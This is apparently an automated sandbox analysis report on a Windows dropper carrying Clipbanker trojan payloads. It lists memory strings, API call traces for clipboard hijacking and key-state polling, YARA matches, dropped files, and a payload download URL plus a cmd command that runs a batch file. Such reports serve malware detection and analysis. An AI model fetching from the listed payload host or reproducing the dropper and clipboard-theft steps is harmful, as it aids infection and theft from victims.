Source: Pct.pif, 0000000B.00000002.3806737898.0000000001B5B000.00000004.00000800.00020000.00000000.sdmp, KJEBKJDAFHJDGDHJKKEG.11.dr String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: Pct.pif, 0000000B.00000002.3806737898.0000000001B5B000.00000004.00000800.00020000.00000000.sdmp, KJEBKJDAFHJDGDHJKKEG.11.dr String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: FIDGDAKF.11.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Pct.pif, 0000000B.00000002.3806737898.0000000001B5B000.00000004.00000800.00020000.00000000.sdmp, FIDGDAKF.11.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Pct.pif, 0000000B.00000002.3806737898.0000000001B5B000.00000004.00000800.00020000.00000000.sdmp, FIDGDAKF.11.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Pct.pif, 0000000B.00000002.3806737898.0000000001B5B000.00000004.00000800.00020000.00000000.sdmp, KJEBKJDAFHJDGDHJKKEG.11.dr String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: Pct.pif, 0000000B.00000002.3806737898.0000000001B5B000.00000004.00000800.00020000.00000000.sdmp, KJEBKJDAFHJDGDHJKKEG.11.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: Pct.pif, 0000000B.00000002.3806737898.0000000001B5B000.00000004.00000800.00020000.00000000.sdmp, FIDGDAKF.11.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: FIDGDAKF.11.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Pct.pif, 0000000B.00000002.3806737898.0000000001B5B000.00000004.00000800.00020000.00000000.sdmp, FIDGDAKF.11.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: KJEBKJDAFHJDGDHJKKEG.11.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.dr String found in binary or memory: https://mozilla.org0/
Source: KFCFBFHIEB.exe, 00000016.00000003.3805594127.000000000287E000.00000004.00000020.00020000.00000000.sdmp, l3[1].exe.11.dr, oobeldr.exe.22.dr, KFCFBFHIEB.exe.11.dr String found in binary or memory: https://sectigo.com/CPS0
Source: Pct.pif, 0000000B.00000002.3806610592.0000000001A3B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sst.my/
Source: Pct.pif, 0000000B.00000002.3806641933.0000000001A6A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sst.my/folder/l3.exe
Source: JJDGIIDHJEBGIDHJJDBKEHCAAA.11.dr String found in binary or memory: https://support.mozilla.org
Source: JJDGIIDHJEBGIDHJJDBKEHCAAA.11.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: JJDGIIDHJEBGIDHJJDBKEHCAAA.11.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: Pct.pif, 0000000B.00000002.3806737898.0000000001B5B000.00000004.00000800.00020000.00000000.sdmp, KJEBKJDAFHJDGDHJKKEG.11.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: file.exe, 00000000.00000003.2198637480.00000000028FC000.00000004.00000020.00020000.00000000.sdmp, Cake.0.dr, Pct.pif.2.dr String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: FIDGDAKF.11.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: Pct.pif.2.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: file.exe, 00000000.00000003.2198637480.00000000028FC000.00000004.00000020.00020000.00000000.sdmp, Cake.0.dr, Pct.pif.2.dr String found in binary or memory: https://www.globalsign.com/repository/06
Source: FIDGDAKF.11.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: JJDGIIDHJEBGIDHJJDBKEHCAAA.11.dr String found in binary or memory: https://www.mozilla.org
Source: JJDGIIDHJEBGIDHJJDBKEHCAAA.11.dr String found in binary or memory: https://www.mozilla.org#
Source: JJDGIIDHJEBGIDHJJDBKEHCAAA.11.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: JJDGIIDHJEBGIDHJJDBKEHCAAA.11.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: JJDGIIDHJEBGIDHJJDBKEHCAAA.11.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Pct.pif, 0000000B.00000002.3806737898.0000000001B5B000.00000004.00000800.00020000.00000000.sdmp, KJEBKJDAFHJDGDHJKKEG.11.dr String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
Source: unknown Network traffic detected: HTTP traffic on port 63886 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63886
Source: unknown HTTPS traffic detected: 103.6.198.219:443 -> 192.168.2.6:63886 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_004050CD
Contains functionality to modify clipboard data
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00C34830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 11_2_00C34830
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00C34632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 11_2_00C34632
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004044A5
Potential key logger detected (key state polling based)
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00C4D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 11_2_00C4D164

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 25.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 25.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 22.2.KFCFBFHIEB.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 22.2.KFCFBFHIEB.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000016.00000002.3807704895.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000016.00000002.3807704895.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000019.00000002.4659046866.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000019.00000002.4659046866.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Process Stats: CPU usage > 49%
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_6CC8B8C0 rand_s,NtQueryVirtualMemory, 11_2_6CC8B8C0
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_6CC8B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 11_2_6CC8B910
Contains functionality to communicate with device drivers
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00C242D5: CreateFileW,DeviceIoControl,CloseHandle, 11_2_00C242D5
Contains functionality to launch a process as a different user
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00C18F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 11_2_00C18F2E
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx, 0_2_00403883
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00C25778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 11_2_00C25778
Creates files inside the system directory
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\KateContributor Jump to behavior
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\DirectionsHardcover Jump to behavior
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\BootInvest Jump to behavior
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\RewardsPassage Jump to behavior
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\CompSubcommittee Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040497C 0_2_0040497C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00406ED2 0_2_00406ED2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004074BB 0_2_004074BB
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00BCB020 11_2_00BCB020
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00BC94E0 11_2_00BC94E0
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00BC9C80 11_2_00BC9C80
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00BE23F5 11_2_00BE23F5
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00C48400 11_2_00C48400
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00BF6502 11_2_00BF6502
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00BCE6F0 11_2_00BCE6F0
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00BF265E 11_2_00BF265E
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00BE282A 11_2_00BE282A
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00BF89BF 11_2_00BF89BF
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00BF6A74 11_2_00BF6A74
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00C40A3A 11_2_00C40A3A
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00BD0BE0 11_2_00BD0BE0
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00C1EDB2 11_2_00C1EDB2
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00BECD51 11_2_00BECD51
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00C40EB7 11_2_00C40EB7
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00C28E44 11_2_00C28E44
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00BF6FE6 11_2_00BF6FE6
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00BE33B7 11_2_00BE33B7
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00BEF409 11_2_00BEF409
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00BDD45D 11_2_00BDD45D
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00BE16B4 11_2_00BE16B4
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00BCF6A0 11_2_00BCF6A0
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00BDF628 11_2_00BDF628
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00BC1663 11_2_00BC1663
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00BE78C3 11_2_00BE78C3
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00BE1BA8 11_2_00BE1BA8
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00BEDBA5 11_2_00BEDBA5
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00BF9CE5 11_2_00BF9CE5
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00BDDD28 11_2_00BDDD28
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00BEBFD6 11_2_00BEBFD6
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00BE1FC0 11_2_00BE1FC0
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_6CC235A0 11_2_6CC235A0
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_6CC66CF0 11_2_6CC66CF0
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_6CC36C80 11_2_6CC36C80
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_6CC9AC00 11_2_6CC9AC00
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_6CC65C10 11_2_6CC65C10
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_6CC72C10 11_2_6CC72C10
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_6CC60DD0 11_2_6CC60DD0
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_6CC3FD00 11_2_6CC3FD00
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_6CC4ED10 11_2_6CC4ED10
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_6CC2BEF0 11_2_6CC2BEF0
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_6CC3FEF0 11_2_6CC3FEF0
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_6CC45E90 11_2_6CC45E90
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_6CC84EA0 11_2_6CC84EA0
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_6CC72E4E 11_2_6CC72E4E
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_6CC49E50 11_2_6CC49E50
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_6CC63E50 11_2_6CC63E50
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_6CC96E63 11_2_6CC96E63
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_6CC67E10 11_2_6CC67E10
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_6CC89E30 11_2_6CC89E30
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_6CC2DFE0 11_2_6CC2DFE0
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_6CC56FF0 11_2_6CC56FF0
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_6CC39F00 11_2_6CC39F00
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_6CC658E0 11_2_6CC658E0
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_6CC48850 11_2_6CC48850
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_6CC4D850 11_2_6CC4D850
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_6CC37810 11_2_6CC37810
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_6CC6B820 11_2_6CC6B820
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_6CC74820 11_2_6CC74820
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_6CC82990 11_2_6CC82990
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_6CC2C9A0 11_2_6CC2C9A0
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_6CC5D9B0 11_2_6CC5D9B0
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_6CC4A940 11_2_6CC4A940
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_6CC3D960 11_2_6CC3D960
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_6CC7B970 11_2_6CC7B970
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_6CC68AC0 11_2_6CC68AC0
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_6CC41AF0 11_2_6CC41AF0
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_6CC9BA90 11_2_6CC9BA90
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_6CC54AA0 11_2_6CC54AA0
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\KFCFBFHIEB.exe F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: String function: 00BD1A36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: String function: 00BE0D17 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: String function: 00BE8B30 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: String function: 6CC5CBE8 appears 73 times
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: String function: 6CC694D0 appears 35 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 004062A3 appears 57 times
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000003.2198637480.00000000028FC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAutoIt3.exeB vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 25.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 25.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 22.2.KFCFBFHIEB.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 22.2.KFCFBFHIEB.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000016.00000002.3807704895.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000016.00000002.3807704895.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000019.00000002.4659046866.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000019.00000002.4659046866.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@34/39@3/2
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00C2A6AD GetLastError,FormatMessageW, 11_2_00C2A6AD
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00C18DE9 AdjustTokenPrivileges,CloseHandle, 11_2_00C18DE9
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00C19399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 11_2_00C19399
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004044A5
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00C24148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 11_2_00C24148
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004024FB CoCreateInstance, 0_2_004024FB
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00C2443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx, 11_2_00C2443D
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\GECOJ0Y6.htm Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6720:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1484:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7164:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Mutant created: \Sessions\1\BaseNamedObjects\jW5fQ5e-C7lR7tC1q
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6060:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\nsx35BB.tmp Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Tag Tag.bat & Tag.bat
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
